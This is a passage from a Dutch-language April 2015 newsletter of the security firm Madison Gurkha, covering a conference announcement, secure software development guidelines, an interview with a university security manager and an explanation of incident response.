update i T S X DE COLUMN 2 Remco Huisman HET NIEUWS 3 NEN 7510: aantoonbaar in control? Kennispartnership HSD Hands-on kennisoverdracht

Maat: px
Weergave met pagina beginnen:

Download "update i T S X DE COLUMN 2 Remco Huisman HET NIEUWS 3 NEN 7510: aantoonbaar in control? Kennispartnership HSD Hands-on kennisoverdracht"

Transcriptie

1 Your Security is Our Business 24 april 2015 update DE COLUMN 2 Remco Huisman HET NIEUWS 3 NEN 7510: aantoonbaar in control? Kennispartnership HSD Hands-on kennisoverdracht HET event 4 Black Hat Sessions Part XIII: Hoe veilig is (IT in) Nederland? het inzicht 6 Rob van der Veer van de SIG over Secure Software Development de klant 8 8 vragen aan Frank Brokken, Security Manager bij de Rijksuniversiteit Groningen (RUG) ITSX 10 Marcus Bakker geeft uitleg over incident response Marloes Kwakkel stelt zich voor De hack 12 Rinke Beimin over het uitbuiten van XSS-kwetsbaarheden Workshops en Cursussen 15 agenda 15 HET COLOFON 15 i T S X

2 de column In iedere Madison Gurkha Update vindt u een leuke en informatieve column, die de lezer een verfrissende kijk biedt op uiteenlopende onderwerpen rondom IT-beveiliging. Deze keer laten we Remco Huisman aan het woord. Hoe veilig is uw IT? Op het moment dat ik deze column schrijf, 18 maart 2015, zijn de voorbereidingen voor de Black Hat Sessions die plaatsvindt op 18 juni a.s. in volle gang. We zijn eigenlijk al een heel eind gevorderd. Het programma is ingevuld en eerder vandaag is de leaflet richting de drukker gegaan. Het thema van deze editie van het jaarlijkse security congres van Madison Gurkha luidt: Hoe veilig is (IT in) Nederland? Die brede vraag zou eigenlijk iedereen moeten vertalen naar de eigen organisatie. Hoe veilig is onze IT?. Om die vraag te beantwoorden laten onze opdrachtgevers structureel testen uitvoeren op een breed scala van doelen. Vaak gaat het om zogenaamde internet facing systemen zoals (corporate) websites, klantenportalen, thuiswerkoplossingen, VPN-connecties etc. En soms gaat het ook om interne systemen. Hoe veilig is ons interne kantoornetwerk gezien vanuit de binnenkant? Het valt ons op dat er relatief weinig aandacht is voor bepaalde systemen, die toch erg bepalend zijn voor de veiligheid van IT in organisaties en daarmee voor de ITveiligheid van ons land. Ik zal in deze column niet ingaan op de veiligheid van SCADA/ICS-systemen. Daarvoor is al wat langer aandacht en tijdens de Black Hat Sessions zal hier door sprekers uit het veld uitgebreid op in worden gegaan. Maar waar ik wel graag aandacht voor wil vragen is het volgende. Ten eerste zijn dat IT-systemen in wat ik zou noemen facility management netwerken. Voor zover deze systemen al opgenomen zijn in een apart netwerk. Typische systemen die wij in facility management netwerken aantreffen zijn onder andere toegangscontrolesystemen. Als u uw RFID-pas voor een lezer houdt, dan wordt vervolgens aan een systeem in het netwerk gevraagd of de pas met uw ID door het betreffende poortje mag. Zo n systeem is vanuit een hacker perspectief erg interessant. Als een hacker dat systeem over kan nemen kan hij bepalen welke toegangspassen welke rechten hebben en kan hij zelfs nieuwe (valse) pas ID s aanmaken. Het wordt dan ineens wel erg simpel om fysiek toegang tot een gebouw te krijgen. Andere systemen die je op dit soort netwerken binnen organisaties aantreft zijn bijvoorbeeld kassasystemen (van de kantine), IP-camera s van de bewaking, alarmsystemen, klimaatbeheersingssystemen etc. Veel van dit soort systemen zijn kwetsbaar omdat ze moeilijk gepatched kunnen worden en vaak langdurig worden gebruikt. In dat opzicht lijken de systemen op SCADA/ICS-systemen die in de procesindustrie worden gebruikt. Heeft u wel eens een technisch beveiligingsonderzoek laten uitvoeren naar de kwetsbaarheid van het facility management netwerk? Onze ervaringen bij dit soort onderzoeken laten tot nu toe zien dat ze het onderzoeken meer dan waard zijn (en dan druk ik me voorzichtig uit). Tot slot wil ik graag uw aandacht vragen voor ERP-systemen. U heeft hierover al meer kunnen lezen in de rubriek Het Inzicht van de vorige Madison Gurkha Update. Het SAP-systeem is voor organisaties vaak hét kroonjuweel en de kwetsbaarheid van deze systemen verdient meer aandacht dan het nu vaak krijgt. Tijdens de Black Hat Sessions zullen we wat betreft SAP-systemen dieper op de materie ingaan tijdens de lezing The Latest Changes to SAP Cybersecurity Landscape. Deze presentatie zal worden gegeven door Alexander Polyakov of Dmitry Chastuchin, beide van Business Application Security provider ERPscan. Interessante onderwerpen waarover ik graag met u een keer verder van gedachten wissel. Graag tot ziens op 18 juni a.s. in Ede en veel leesplezier met deze Update. Remco Huisman Partner, commercieel directeur 2 Madison Gurkha april 2015

3 In Het Nieuws belichten we nieuwe ontwikkelingen in de IT-beveiligingswereld en rondom Madison Gurkha. NEN 7510: aantoonbaar in control? het NIEUWS De decentralisatie naar gemeenten en de toenemende behoefte aan privacy hebben ook de wetgever wakker geschud. Zo is de verwachting dat op korte termijn de NEN-normen 7510 (versie 2011) en 7513 verplicht zullen worden gesteld. Het wachten is nog op de goedkeuring door de Eerste Kamer. Met name de zorg in Nederland ligt de laatste tijd onder een vergrootglas van zowel de politiek als de toezichthouders. De verplichting van de NEN 7510 betekent voor deze sector dat zij de beveiliging van hun informatie op orde moeten hebben en aantoonbaar in control moeten zijn. Zorgvuldige omgang met (medische) persoonsgegevens vereist zowel kennis van het recht, als de organisatorische en technische (beveiligings)maatregelen. Om die reden biedt Madison Gurkha samen met ITSX en Louwers IP Technology Advocaten, een integrale oplossing aan waarbij aan al deze drie invalshoeken gezamenlijk aandacht wordt besteed. Tijdens de afgelopen vakbeurs Zorg & ICT op 18 en 19 maart jl. hebben wij een aantal presentatiesessies verzorgd om de bezoekers te informeren over dit onderwerp aan de hand van een inspirerende casus. Een soortgelijke presentatie verzorgen we ook tijdens Overheid 360 op 22 en 23 april a.s. waarbij uiteraard de casus gespecificeerd is op de overheid. Wij gaan verhuizen! Het hoge woord mag eruit. Madison Gurkha gaat verhuizen. Ons nieuwe kantoor bevindt zich een aantal meter verderop aan de Vestdijk 59, naast het kantoor van De Lage Landen. Binnenkort ontvangt u van ons nog een officieel verhuisbericht. Hoewel we onze vertrouwde werkplek zeker zullen missen, kijken we er erg naar uit om in deze nieuwe moderne werkomgeving aan uitdagende projecten te mogen werken. In de volgende Update zullen we met trots wat foto s laten zien van ons nieuwe kantoor. Meehelpen aan een veiliger wereld doen we graag! The Hague Security Delta (HSD) is een groeiend netwerk van bedrijven, overheden en kennisinstellingen in binnen- en buitenland, die samenwerken om producten, diensten of kennis te ontwikkelen voor een veiliger wereld. Madison Gurkha ondersteunt dit initiatief volledig en deelt graag haar kennis op het gebied van Cyber Security, Critical Infrastructure en Forensics. Madison Gurkha heeft zich daarom aangesloten bij het netwerk en is sinds maart jl. kennispartner van HSD. Dochterbedrijf ITSX is ook partner en sinds juni 2014 gevestigd op de campus van HSD. Hands-on kennis opdoen Eerder dit jaar organiseerden wij voor de tweede maal de workshop Hacken met een Teensy. Gezien de grote animo voor dit soort hands-on kennisoverdracht en de positieve reacties na afloop, is er ook dit jaar tijdens de Black Hat Sessions voldoende ruimte gemaakt voor een interactieve workshop. Dit keer leggen we uit hoe een XSS-kwetsbaarheid gebruikt kan worden om domain admin-rechten te krijgen. Meer over deze workshop en andere cursussen leest u elders in deze Update. Madison Gurkha april

4 het event Op 18 juni a.s. organiseert Madison Gurkha alweer voor de dertiende maal het inmiddels befaamde security congres Black Hat Sessions. Het thema dit jaar is: Hoe veilig is (IT in) Nederland? 18 juni 2015 De ReeHorst in Ede Black Hat Sessions Part XIII Hoe veilig is (IT in) Nederland? Onze samenleving en economie zijn kwetsbaar door de toenemende afhankelijkheid van ICT. De vraag Hoe veilig is (IT in) Nederland? is dan ook relevanter dan ooit. Zowel voor techneuten als het management belooft het een inspirerende dag te worden met interessante sprekers uit het veld, informatieve workshops en voorbeelden uit de praktijk. Het is natuurlijk ook een uitgelezen kans om met vakgenoten van gedachten te wisselen en bij te praten. energie en water, maar ook aan transport en telecommunicatie. En wat zijn de financiële sector en gezondheidszorg zonder IT? Het einde van de digitalisering is nog lang niet in zicht. Met het internet verbonden systemen in huis, in de auto en rondom het lichaam worden gemeengoed. Tijdens de Black Hat Sessions wordt u in één dag bijgepraat door prominente nationale en internationale sprekers. We besteden in een gevarieerd dagprogramma onder andere aandacht aan DDoS-aanvallen, SCADA/ICSsystemen, Top-Level Domains, SIEM, secure smart grids en SAP security. Naast de plenaire sessies is er de keuze uit een technische track en een management track zodat u ongeacht uw achtergrond een interessant programma kunt volgen. Een aantal lezingen en demonstraties zijn diep-technisch, terwijl andere juist bij uitstek geschikt zijn voor het management. Het is natuurlijk ook een uitgelezen kans om met vakgenoten van gedachten te wisselen over al deze onderwerpen. IT is onmisbaar Binnen een groot deel van de vitale infrastructuur is IT onmisbaar geworden: denk hierbij aan de levering van De vraag is dan ook niet of, maar wanneer het volgende grote incident zich aandient Onze samenleving en economie zijn kwetsbaar door de toenemende afhankelijkheid van ICT. De vraag is dan ook niet of, maar wanneer het volgende grote incident zich aandient. Het Nationaal Cyber Security Centrum (NCSC), onderdeel van de NCTV, draagt bij aan het gezamenlijk vergroten van de weerbaarheid van de Nederlandse samenleving in het digitale domein en is daarmee een belangrijke speler op dit gebied. Het NCSC heeft verschillende initiatieven ontplooid om Nederland veilig te houden, waaronder het Nationaal Respons Netwerk (NRN) en het Nationaal Detectie Netwerk (NDN). In het NRN bundelen het NCSC en ICT-responsorganisaties uit publieke en private sectoren hun ervaring, kennis en capaciteit op het gebied van incident response. Een ander voorbeeld van netwerkgericht de handen ineen slaan, is het delen van dreigingsinformatie binnen het NDN. Hierbij wordt door het NCSC en haar partners operationele informatie waarmee digitale aanvallen en aanvallers kunnen worden gedetecteerd gedeeld met publieke en private partijen. Wat is de stand van zaken op het gebied van de kritieke infrastructuur in Nederland? Mr. Hans de Vries, hoofd van het NCSC, zal het publiek tijdens de Black Hat Sessions Part XIII bijpraten over de actuele dreigingen in het digitale domein. Hij gaat daarbij in op de door het NCSC geïnitieerde projecten zoals de NRN en NDN om de digitale weerbaarheid verder te verhogen. Uiteraard zal het NCSC haar best doen om zoveel als mogelijk informatie met het publiek te delen. Het belooft een boeiende keynote te worden. Ir. Eric Luiijf is een vooraanstaand deskundige op het gebied van veiligheid van vitale infrastructuur (en informa- 4 Madison Gurkha april 2015

5 Het event tie-infrastructuur), en de militaire en civiele aspecten van cyberactivisme, -terrorisme en -conflicten. In 2002/2003 was Eric met zijn projectteam betrokken bij de beleidsvorming rondom de Nederlandse vitale infrastructuur. Sindsdien onderzoekt hij in een reeks Europese projecten de bescherming van vitale (informatie)infrastructuren, onder andere tegen domino-uitval (ACIP, IRRIIS, EURAM, EURACOM, DIESIS, RECIPE, CIPRNet, PREDICT, INTACT en SEGRID). Eric Luiijf zal tijdens de Black Hat Sessions een keynote verzorgen waarbij hij vanuit zijn rol als principal consultant bij het TNO, ingaat op de actualiteiten omtrent het thema. Zowel Eric Luiijf als Hans de Vries zijn vanuit hun positie nauw betrokken bij het thema en zij zullen u een interessante kijk bieden op de materie. Helaas hebben we hier geen ruimte om alle sessies uit te lichten, maar het overige sprekersprogramma is minstens zo interessant. Zie hieronder een korte samenvatting. Op vindt u het volledige programmaoverzicht. K. Reid Wightman, directeur van Digital Bond Labs en voormalig specialist bij het Pentagon vertelt over de kwetsbaarheden in ICS-systemen. Alex Bik, CTO bij internetprovider BIT, gaat in op techniek achter de anti-ddos Wasstraat. Teun van Dongen, zelfstandig auteur en analist op het gebied van nationale en internationale veiligheid, zal het publiek aanzetten tot een kritische reflectie over de manier waarop we in Nederland met nationale veiligheid en terrorismebestrijding omgaan. Ed de Myttenaere en Paul van der Ploeg, van Nuclear Research & consultancy Group (NRG), zullen ingaan op de nucleaire sector. Vanuit Business Application Security provider ERPscan wordt een boeiende presentatie verzorgd met als titel The Latest Changes to SAP Cybersecurity Landscape. Deze presentatie zal worden gegeven door Alexander Polyakov of Dmitry Chastuchin. Beide zijn bekend van o.a. BlackHat, Hack in the Box en t2 infosec. Erwin Kooi, security architect bij Alliander - IT Digitale Netten, geeft tijdens een technische sessie een introductie in secure smart grids, de security uitdagingen daarvan en hoe Alliander hiermee omgaat om ook in de toekomst voor een goede stroomvoorziening te kunnen zorgen. Maciej Korczynski, postdoctoraal onderzoeker op het gebied van cyber security verbonden aan de TU Delft, zal ingaan op de beveiliging van Top-Level domeinen (TLD s) en Daniël Dragi čevi ć, security consultant bij Madison Gurkha verzorgt samen met een collega een uitgebreide technische demonstratie. Meld u aan als relatie van Madison Gurkha Wij hopen dat u deze dag (wederom) samen met ons wilt doorbrengen in de ReeHorst in Ede. Uiteraard geldt voor relaties van Madison Gurkha een relatiekorting. Geef bij uw aanmelding via het inschrijfformulier de code 6efPvuqC op en de 10% korting wordt direct verrekend. Wellicht is dit congres ook interessant voor uw collega s? U kunt gebruik maken van de extra geldende groepskortingen van 10% bij 5 tot 10 deelnemers. Meldt u meer dan 10 deelnemers tegelijkertijd aan, dan profiteert u van 15% extra groepskorting. Groepsaanmeldingen kunt u per e- mail aan versturen. Gezien de grote animo van vorig jaar is er ook dit jaar ruimte vrijgemaakt voor een interactieve workshop: Van XSS naar domain admin. Bovendien wordt er een PGP Key Signing Party georganiseerd. Meer hierover leest u elders in deze Update. Zorg dat u erbij bent en meld u snel aan. Vul de code 6efPvuqC in bij uw online inschrijving en de 10% relatiekorting wordt direct verrekend! Meer informatie over het congres en het inschrijfformulier vindt u op Madison Gurkha april

6 het inzicht In de rubriek Het Inzicht stellen wij bepaalde (technische) beveiligingsproblemen aan de orde. Dit keer geeft Rob van der Veer van de Software Improvement Group (SIG) meer inzicht in Secure Software Development. Duidelijkheid over veilige software Grip op Secure Software Development is een verzameling richtlijnen over samenwerken voor goed beveiligde software. Het is een co-productie van tientallen specialisten, opdrachtgevers en leveranciers, onder de paraplu van het CIP: het Centrum voor Informatiebeveiliging en Privacybescherming. De richtlijnen gaan over de samenwerking tussen opdrachtgever en softwareontwikkelaar en het beschrijven van duidelijke en meetbare beveiligingseisen. Deze publicaties zijn vrij beschikbaar op en worden onderhouden door meer dan 20 organisaties in de groep Practitioners Grip op SSD, met Cap Gemini, IBM, UWV, Postnl, CIBG, Dictu, Belastingdienst, SVB, Binnenlandse Zaken, OWASP, CGI, Sogeti, Ordina, Software Improvement Group, DKTP en Valori. Naast deze richtlijnen zijn ook trainingsmaterialen, testmethodes en inkoopcontracten voor vrij gebruik beschikbaar. Het bijzondere van deze samenwerking is dat de betrokken organisaties een manifest tekenen waarin ze zeggen achter de Grip op SSD richtlijnen te staan met de belangrijke opmerking dat daarvan kan worden afgeweken - mits dat wordt toegelicht aan de groep. Het zijn juist die afwijkingen die interessant zijn om te gebruiken als uitbreiding en verbetering van de richtlijnen. Dit resulteert in het delen van kennis en ervaring, zoals bijvoorbeeld de Cloud Security Alliance die helpt om security-aspecten specifiek voor de cloud toe te voegen. De richtlijnen zijn dus geen keurslijf, maar een communicatiemiddel en de betrokkenheid van zoveel partijen zorgt voor duurzame doorontwikkeling. Door deze samenwerking hoeven organisaties niet meer zelf het wiel uit te vinden wat betreft het maken van afspraken, contracten en beheersingsprocessen. Leveranciers vinden het ook prettig dat er een standaard manier van werken is met meerdere van hun klanten. Ontstaan van Grip op SSD In mijn werk voor de SIG help ik organisaties met vraagstukken over softwarekwaliteit. Is een systeem onderhoudbaar? Schaalt het? Ook word ik gevraagd te kijken of de security goed is ingebouwd en dan valt op dat hier de meest elementaire fouten worden gemaakt. SIG meet software security op een schaal van 1 tot 5 sterren en wat we veel zien zijn systemen die twee sterren scoren. Bij nader onderzoek blijkt dat dit vooral wordt veroorzaakt door onduidelijke afspraken en 6 Madison Gurkha april 2015

7 het inzicht een gebrek aan een goede toetsing. Veel organisaties willen hier iets aan doen en zijn op zoek naar goede manieren om te regelen dat de gebruikte software veiliger wordt. Over dit onderwerp raakte ik begin 2013 vanuit SIG in gesprek met het CIP. We wilden iets doen aan dit probleem en we zagen de behoefte aan een handreiking die opdrachtgevers en leveranciers laat zien wat je kan doen om samen tot veilige software te komen. Vervolgens is er een werkgroep opgericht en zijn we gaan schrijven. Vooral Marcel Koers, toenmalig CISO van het UWV, heeft hier het schrijfwerk verricht, geholpen door vele andere specialisten. We hoefden hier natuurlijk niet het wiel uit te vinden want er was al veel ontwikkeld en geschreven. De kunst was om de beschikbare informatie handzaam en duidelijk bij elkaar te brengen en in een haalbare vorm te gieten. Dat is gelukt door gebruik te maken van volwassenheidsniveaus. Iedereen kan het. De methode De methode Grip op SSD beschrijft hoe een opdrachtgever grip krijgt op het laten ontwikkelen van goed beveiligde software. Dat kan bij een interne ontwikkelafdeling zijn of bij een externe leverancier. De drie pijlers van de methode zijn: 1. standaard beveiligingseisen 2. contactmomenten 3. het inrichten van de juiste processen Deze processen zijn onder meer het bijhouden van risico s, het onderhouden van eisen en het laten groeien van de organisatie naar hogere volwassenheidsniveaus. Voor de definitie van de normen is een nieuwe, fundamentele beschrijvingswijze (SIVA) gehanteerd, met zeggingskracht voor managers, ontwikkelaars, testers, auditors en securityspecialisten. De normen zijn gestoeld op de NCSC-richtlijnen voor (web)applicaties. Per norm wordt de link gelegd naar gerelateerde richtlijnen van NCSC en van OWASP ASVS (Application Security Verification Standard). Ook wordt per onderdeel aangegeven wie verantwoordelijk is: opdrachtgever, bouwer of bijvoorbeeld hostingpartij. Inmiddels heeft IBM de normen laten vertalen naar het Engels. We zien nu dat bij het toepassen van Grip op SSD de betrokken opdrachtgevers en software-ontwikkelaars beter weten waar ze aan toe zijn en er een einde komt aan hun babylonische spraakverwarring. Security after the fact wordt daarmee security by design. Rob van der Veer Software Improvement Group Welk probleem lost dit op? We hoeven de krant maar open te slaan om te zien dat het slecht gesteld is met de veiligheid van software. Hier volgen enkele uitspraken uit de praktijk om aan te geven waar het mis gaat en hoe Grip op SSD daarop inspeelt. Wij gaan ervan uit dat een leverancier weet hoe je veilige software maakt. Mooi, maar hoe weet de leverancier wat jij veilig genoeg vindt voor de toepassing? Bovendien, als je alleen functies beschrijft, dan zal de leverancier zich vooral daarop concentreren als de tijd dringt. Grip op SSD beschrijft hoe je de veiligheid afstemt met comply or explain. Ik dacht dat de hostingpartij dat zou regelen. Grip op SSD maakt expliciet waar verantwoordelijkheden en taken liggen, bijvoorbeeld als het gaat om patching van componenten. We hadden niet verwacht dat securityeisen getoetst zouden worden. Ontwikkelaars willen graag veilige software schrijven, maar eisen zijn vaak niet duidelijk of ontbreken en er wordt niet of pas laat getoetst, bijvoorbeeld met een pentest. Een leverancier fixt dan de daarin gevonden lekken en het is klaar. Typisch gebeurt dat in de drukste periode waardoor er onvoldoende tijd is voor structurele verbeteringen. Grip op SSD beschrijft hoe je vooraf, tijdens en na ontwikkeling de veiligheid kunt toetsen. O, leidt dat tot reputatieschade? In de praktijk blijkt dat softwarebouwers onvoldoende begrijpen wat de gevolgen zijn van bepaalde fouten. Grip op SSD geeft aan dat de resultaten van risicoanalyses worden gecommuniceerd naar alle ontwikkelaars. Het moet aan de OWASP top 10 voldoen. Deze top 10 is heel belangrijk voor bewustwording, maar is niet specifiek en niet compleet en daarmee ongeschikt als afspraak. Eén van de OWASP top 10 kwetsbaarheden is het lekken van gevoelige data. Als opdrachtgever wil je duidelijker zijn over wat je hier verwacht. De standaard beveiligingseisen in Grip op SSD zijn hier expliciet over. Madison Gurkha april

8 De klant In elke Madison Gurkha Update laten wij een klant aan het woord. Dit keer een openhartig gesprek met Frank Brokken, Security Manager bij de Rijksuniversiteit Groningen. 8vragen aan Frank Brokken, Security Manager bij de Rijksuniversiteit Groningen (RUG). 1 3 Wat is je rol binnen de RUG? Vanuit mijn rol als Security Manager geef ik gevraagde en ongevraagde adviezen aan de directie van het Centrum voor Informatietechnologie (CIT). In deze positie is het belangrijk om volstrekt onafhankelijk te zijn. Dit kan nog wel eens tot clashes leiden, maar gelukkig wordt de waarde er wel van ingezien. Bovendien vind ik het belangrijk om contact en feeling te houden met de technici die de machines onderhouden en bedienen. 4 Naast mijn rol als Security Manager geef ik vanuit het CIT onderwijs in de programmeertaal C++, en vanuit de vakgroep Informatica geef ik de vakken Information Security en Computer-architectuur. 2Hoe is informatiebeveiliging georganiseerd binnen de RUG? Een van mijn eerste taken was om een universitair-brede Acceptable Use Policy (AUP) op te stellen. Deze AUP is in 2001 door het college van bestuur (CvB) geaccepteerd. Dit heeft binnen de RUG gezorgd voor een formeel-juridische basis waarop de IT-beveiliging wordt gebaseerd en aan getoetst kan worden. Sinds ongeveer 2002 wordt ik bijgestaan door een groep van ongeveer acht collega s die samen de Security Kerngroep vormen. In de praktijk bereidt de Security Kerngroep het beleid op het gebied van IT security voor, waarna de directie CIT en/of het CvB van de RUG de voorstellen al dan niet overneemt. Bij deze groep zijn niet alleen technici betrokken, maar bijvoorbeeld ook het hoofd van juridische zaken om te voorkomen dat we op het gebied van regelgeving blunderen. Voor ernstige IT-incidenten is er een vergelijkbare groep. Het zogenaamde Crashteam bestaande uit collega s met een meer dan gemiddelde kennis op de IT-gebieden die voor de RUG van belang zijn. Op dit moment worden er binnen de RUG stappen ondernomen om een RUG-breed Security Team te ontwikkelen waarbij de Security Manager, samen met een nog aan te stellen Privacy Functionaris, de algehele IT-beveiliging van de RUG zal organiseren. Hierin zullen ook vertegenwoordigers van onderwijs, onderzoek en overige ondersteunende diensten plaatsnemen. Hoeveel mensen houden zich binnen de RUG bezig met informatiebeveiliging? Ik hoop natuurlijk dat dat er zo n zijn: alle studenten en medewerkers. Maar ik vrees dat ik daar in de realiteit niet op uitkom. Wanneer ik de hierboven genoemde groepen bij elkaar optel dan zijn er dat zo n 25. Waarschijnlijk doe ik dan nog een aantal collega s onrecht. Daarvoor corrigerend kom ik op ongeveer 50 personen. Zijn er ook contacten met andere universiteiten / hoge scholen? Welke rol speelt SURFnet op dit gebied? Die zijn er zeker. Wij zijn ook nauw betrokken bij SURFibo. IBO staat voor Informatie Beveiligers Overleg en vertegenwoordigt het Nederlands hoger onderwijs (en academische ziekenhuizen). IBO is rond 2003 voortgekomen uit de toenmalige SOHO groep (Security Officers voor het Hoger Onderwijs). Bij de oprichting van de IBO-groep was ik gedurende een paar jaar voorzitter. Daarna is die functie overgenomen door Alf Moens (eerst TU Delft, inmiddels SURF) en momenteel is Bart v.d. Heuvel (Universiteit Maastricht) de voorzitter. SURFnet speelt een belangrijke rol doordat het uiteindelijk de sluis is waardoor al ons IT-verkeer wordt getransporteerd. Er zijn dus goede contacten met SURFnet, ook in SURF-ibo en SCIRT (SURFnet Community of Incident Response Teams) verband. 5 In welke mate is IT van belang voor de bedrijfsvoering binnen de RUG? Op dit moment is het functioneren van de IT-faciliteiten welhaast een conditio sine qua non voor de RUG. Uiteraard denk je dan aan standaard zaken als werkstations, web- en faciliteiten en rekenkracht om enorme hoeveelheden data te kunnen verwerken. Maar daarnaast is er een minder in het oog springende, maar voor het functioneren van de RUG minstens zo belangrijke schaduwwereld. En dan heb ik het over toegang tot gebouwen, de bewaking van die gebouwen, de controle van koelinstallaties, de aansturing van apparaten die bijvoorbeeld bij natuurwetenschappelijk onderzoek worden gebruikt en het intern betalingsverkeer dat in hoge mate afhankelijk is van de IT. 6 Wat zijn de belangrijkste uitdagingen op het gebied van informatiebeveiliging? Eigenlijk is dat de strijd tussen het economisch denken en het realiseren van een fatsoenlijk niveau van beveiliging. Een voorbeeld hiervan is het besluit van de RUG 8 Madison Gurkha april 2015

9 de De klant om en grote delen van de dataopslag bij Google onder te brengen. Een enigszins merkwaardig besluit gezien de toen al openbaar gemaakte bevindingen van Edward Snowden. Nog afgezien van de vraag of Google inderdaad beter in staat is om de gewenste faciliteiten aan te bieden, is het toch ook een beetje een motie van wantrouwen naar je eigen technisch personeel. Een mooi voorbeeld waarbij beveiliging ondergeschikt aan economische motieven is gemaakt. Terugkomend op een hierboven eerder beantwoorde vraag: de grote uitdaging is om die personen tot een andere mentaliteit te bewegen. Ik denk dat de techniek hier niet het probleem is. Het probleem is hoe je de doorsnee IT-gebruiker security minded maakt. Vorig jaar werd bij de RUG de actie Your bytes are your babies uitgevoerd. Een beroerde titel, maar een goede actie. Daarbij werd de hele universitaire gemeenschap er indringend op gewezen dat je voorzichtig om moet gaan met de door jouw beheerde informatie, en niet zomaar overal op moet klikken. Iedereen was zich van deze actie bewust en heel veel medewerkers hebben toen voorlichtingsbijeenkomsten gevolgd. Maar wat zie je? In de maanden daarna trappen elke maand nog zo n 80 hoogopgeleide medewerkers in phishing-pogingen. Het excuus Ik dacht dat het een authentiek mailtje was is zo gek nog niet. Sinds een jaar of tien proberen we officiële RUG geauthenticeerd de deur uit te laten gaan. Zodra iedereen massaal z n S/MIME of controleerbaar PGP signeert ben je van het phishing probleem verlost. Zie? De techniek is er wel, maar het gebeurt niet. En daar ligt de uitdaging: de mentaliteitsverandering. 7 8 Welke maatregelen worden genomen om bestaande ITbeveiligingsrisico s onder controle te houden? I can tell you, but then I ll have to kill you... [James Bond, dr. No, 1962] Hoe ondersteunt Madison Gurkha de RUG en wat zijn uw ervaringen tot nu toe? De RUG vraagt Madison Gurkha om elke paar jaar een audit uit te voeren van de IT-faciliteiten van de RUG. Daar komen interessante resultaten uit, die soms wel en soms niet door de directie CIT en CvB worden overgenomen. De samenwerking met Madison is prima en geeft doorgaans voldoende munitie om een aantal wezenlijke verbeteringen voor te stellen of voor te bereiden. Madison Gurkha april

10 ITSX Dit keer in de ITSX-rubriek geeft Marcus Bakker, IT security consultant, uitleg over incident response. Verder stelt Marloes Kwakkel zich aan u voor. Incident response Organisaties worden zich steeds meer bewust van de noodzaak van goede IT-beveiliging en de impact die security incidenten kunnen hebben. De meeste maatregelen die getroffen worden, zijn bedoeld om incidenten te voorkomen. Door toenemende complexiteit en afhankelijkheden is het voorkomen van alle incidenten niet meer mogelijk. Hierdoor moet een organisatie weten hoe ze moet reageren op een incident. Dit proces staat bekend als incident response. Bij incident response worden acties uitgevoerd om de schade, nadat een security incident heeft plaatsgevonden, tot het minimum te beperken (bijv. het uitlekken van klantgegevens naar het internet). Correcte informatiebeveiliging bestaat echter uit drie fases: protectie, detectie en response. Deze fases dienen goed met elkaar geïntegreerd te zijn en steunen daarbij op elkaars processen. Protectie Bij protectie kan men denken aan een actief uitgevoerd informatiebeveiligingsbeleid, bewustzijn binnen de gehele organisatie over IT-beveiligingsrisico s en de mogelijke impact van incidenten op de bedrijfsvoering. Ook toegangscontrole tot systemen en applicaties en het uitvoeren van technische onderzoeken ter verhoging van het niveau van beveiliging vallen onder protectie. Dit laatste zijn bijvoorbeeld penetratietesten op applicaties en risicoanalyses van nog te bouwen of reeds aanwezige applicaties en/of IT-infrastructuren. Detectie Een voorbeeld van detectie is een Intrusion Detection System (IDS). Dit kan (pogingen tot) misbruik van kwetsbaarheden in de IT-infrastructuur signaleren (en ook tegenhouden). Maar het kan ook een automatische controle van logbestanden op mogelijke inbraakpogingen door aanvallers zijn. Hiervoor kan bijvoorbeeld een security information and event management (SIEM) worden gebruikt. Omdat bij detectie de meeste security incidenten naar voren zullen komen zal het incident response proces voor een groot deel worden gevoed door meldingen uit deze fase. Organisaties zijn zich steeds bewuster van het feit dat niet elk security incident te voorkomen is door goede protectie en detectie. Immers, IT is complex waardoor beveiliging hiervan lastig is (heeft u ooit een Patch Tuesday van Microsoft gezien zonder beveiligingsupdates?). Inbraakpogingen zullen er altijd zijn, omdat veel waardevolle bedrijfsprocessen en gegevens staan opgeslagen in IT-systemen. Deze inbraakpogingen kunnen grote gevolgen hebben voor de bedrijfsvoering en/of het imago van de organisatie. Daarnaast is er bij organisaties steeds meer de behoefte aan het op de juiste manier afhandelen van de installatie van noodpatches en andere spoedacties met een hoge prioriteit. Ook deze acties kunnen door middel van een goed incident response proces worden beheerst. Wat zijn de belangrijkste acties die een organisatie dient uit te voeren als er een security incident optreedt? We nemen het voorbeeld van een grote website waarvan de gegevens uit de gebruikersdatabase zijn uitgelekt (gebruikersnamen, wachtwoorden, adressen). Het incident wordt pas opgemerkt nadat er berichten in de media zijn verschenen. In dit geval heeft detectie helaas gefaald. Beter is het wanneer incidenten opgemerkt worden op basis van meldingen uit detectiemethoden. Het is van belang de impact van het incident zo snel mogelijk te beperken. Er dient te worden geanalyseerd waarom de gebruikersgegevens konden uitlekken zodat de kwetsbaarheid direct kan worden verholpen. Als de kwetsbaarheid niet heel snel kan worden achterhaald en opgelost, is het aan te raden de website tijdelijk uit de lucht te halen. Verder dienen de betrokken stakeholders over het incident te worden geïnformeerd. Aan gebruikers meld je o.a. welke gegevens zijn uitgelekt en adviseer je Er dient te worden geanalyseerd waarom de gebruikersgegevens konden uitlekken zodat de kwetsbaarheid direct kan worden verholpen. 10 Madison Gurkha april 2015

11 ITSX de wachtwoorden voor andere websites te wijzigen als daarvoor hetzelfde wachtwoord wordt gebruikt. In interne communicatie naar medewerkers, zoals de klantenservice, wordt verder nog vermeld wat wel en niet mag worden gecommuniceerd richting klanten met betrekking tot het incident. Voor elke stakeholder kan de gecommuniceerde informatie en de manier waarop dit wordt gebracht verschillen. Om het vertrouwen van stakeholders te behouden is transparantie erg belangrijk. Stakeholders dienen op de hoogte te worden gehouden van belangrijke ontwikkelingen over het security incident. Houd er rekening mee dat er veranderingen op komst zijn vanuit de wetgever die het melden van lekken van persoonsgegevens verplicht stellen! Gedurende het incident of nadat de kwetsbaarheid is verholpen kan de beslissing worden genomen verdere analyse uit te voeren. Heeft de aanvaller naast gebruikersgegevens nog andere vertrouwelijke gegevens kunnen stelen en/of systemen kunnen overnemen in de IT-infrastructuur? Centrale logging van events voortkomend uit systemen, applicaties en netwerkapparatuur is heel waardevol bij deze analyse. In combinatie met een forensische analyse van de systemen kan op deze manier goed worden nagegaan wat er is gebeurd. Uit deze analyse kunnen vervolgens weer één of meerdere additionele security incidenten naar voren komen. Bijvoorbeeld een incident waarbij de website door de aanvaller is voorzien van malware en op deze manier bezoekers probeert te infecteren. Het mooie van incident response is dat naast een directe verlaging van de impact, achteraf veel geleerd 